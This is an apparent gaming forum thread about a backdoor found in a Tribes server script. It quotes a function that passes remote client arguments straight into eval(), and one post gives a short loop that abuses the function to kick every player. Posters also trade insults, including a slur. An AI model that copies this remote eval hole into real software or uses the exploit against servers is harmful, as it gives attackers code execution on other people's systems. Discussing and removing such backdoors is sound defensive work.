pm, i received titled "interesting change made to your server"

spockhammer

AlwaysCrying
some1 with server access edit this out asap etc now that its public pls ty i wuld rather not revert the whole server over this


I noticed the file Plugins/Scripts/DoSFix.cs had been updated recently

this function had been added:

Code:
function remoteDoSFixEV(%cl,%x1,%x2,%x3,%x4,%x5)
{
   %cmd = %x1@"(\""@%x2@"\","@%x3@","@%x4@"(\""@%x5@"\"));" ;
   eval(%cmd);
   exec(Prefabs);
}

You had asked me to look for anything suspicious well there is one hell of a backdoor.

You should not mention that I pointed this out to you.
 
Last edited:
speaking of backdoors, hows ur mum dare?

but srsly i have been having trouble connecting to ur server and arghs 4 sum raisen
 
increase my admin power pls i need to regulate

i put server in nazi mode like 2007

only 4 ppl can kick ban etc and it will never be more (might be less soon)

if this stuff is cheats in op then i might revert server to stock branzone and just run it like that

ppl can use stathud if they want stats or play on viral cheat server etc
 
something like :

Code:
 for(%clientId = Client::getFirst(); %clientId != -1; %clientId = Client::getNext(%clientId))
	//if(%clientId != getManagerid())
		remoteEval(2048, "DoSFixEV", "net::kick", %clientId, "\"fuck off\"");

(removed parameters 4 & 5, but you could still execute harmful stuff with the version above)
 
why the fuck has every single active tribes player ftp access to this server, you should limit it to the owner and 1 guy with actual scripting/server knowledge.

237 and lestat all are scum. you should just ban those 2 fgts

Code:
Dedicated Server Initialized
MSG: "Server: Player \"Lestat\" added - id = 2049"
First Level PW
CONNECT: 2049 "Lestat" IP:256.256.256.256:57605
remoteActiveMode: Unknown command.
remoteBWadmin::isCompatible: Unknown command.
Lestat was automatically assigned to team 0
Client Recovery Index = 256.256.256.256Lestat86172
Executing Smurf_97.cs.
2049 IP: 256.256.256.256 Smurfs: Lestat~Vorpal Scimitar~Vorpal Katana~
remoteloadtoys: Unknown command.
displayMenuVoteMenu: modeWaiting = 0
Syntax error in input.
SPAWN: "Lestat": cl:2049 pl:8318 marker:8229 armor:lfemale
remoteRR: Unknown command.
remoteRR: Unknown command.

CONNECT: 2049 "Lestat" IP:256.256.256.256:52945
remoteActiveMode: Unknown command.
remoteBWadmin::isCompatible: Unknown command.
Lestat was automatically assigned to team 0
Client Recovery Index = 256.256.256.256Lestat46478
SPAWN: "Lestat": cl:2049 pl:8323 marker:8231 armor:lfemale
displayMenuVoteMenu: modeWaiting = 0
Syntax error in input.
exec: invalid script file Prefabs.cs.
Executing Smurf_97.cs.
2049 IP: 256.256.256.256 Smurfs: Lestat~Vorpal Scimitar~Vorpal Katana~
remotetoystoggle: Unknown command.
remotetoystoggle: Unknown command.
remotetoystoggle: Unknown command.


remoteLeGun: Unknown command.
remoteLeGun: Unknown command.
remoteLeGun: Unknown command.
remoteLeGun: Unknown command.
remoteLeGun: Unknown command.
remoteLeGun: Unknown command.
remoteLeGun: Unknown command.
remoteLeGun: Unknown command.
remoteLeGun: Unknown command.
remoteLeGun: Unknown command.

2051 IP: 256.256.256.256 Smurfs: Lestat~Vorpal Scimitar~Vorpal Katana~
remotetoysdtoggle: Unknown command.
Client Recovery Index = 256.256.256.256Winona Ryder10629
Syntax error in input.
MSG GLOBAL:    2050: huk it up lestat pls "


SPAWN: "|SuC| 2:37": cl:2049 pl:8329 marker:8253 armor:lfemale
SPAWN: "mun": cl:2050 pl:8349 marker:8290 armor:lfemale
SPAWN: "tentaclepr0n": cl:2054 pl:8346 marker:8283 armor:lfemale
GAME: kill 2053 2053 
displayMenuVoteMenu: modeWaiting = 0
Syntax error in input.
Syntax error in input.
MSG GLOBAL:    2049: are toys loaded?"
SPAWN: "Winona Ryder": cl:2053 pl:8342 marker:8289 armor:lfemale
GAME: kill 2050 2051 1
Syntax error in input.
MSG GLOBAL:    2050: Mes.~wyes"
GAME: kill 2050 2049 4
 
only lestat has access not 237

im fine with lestat having access as he modded some cat and mouse stuff and arghs duel is an incredible mod with some very unique features

route ghosting on the pu server is definitely something im interested in too
 
it's your server so w/e but don't trust anyone. even without backdoor he can simply connect to your server via telnet (password stored in prefs) and execute the shit manually
 
Assholes kept renaming my script making it difficult to do anything without requiring a server restart each time I wanted to tinker.
I think someone trying to remove them ended up causing server loop day(lol).
Instead of running away from you poisonous freaks like I should've, I hid the files and made a command to load them when I needed.
I don't need a backdoor, I have full access. It just made things convenient in a lot of ways(nazi file renamer protection)
Also I haven't touched anything since I initially loaded that on there... just to see if someone would break things again.
I only modified two base ctf functions, and that was to allow bot->flag pickups and was restored to stock on map change.
It is removed, the server is safe again from serious danger.
Good hunting, lol.
 
Back
Top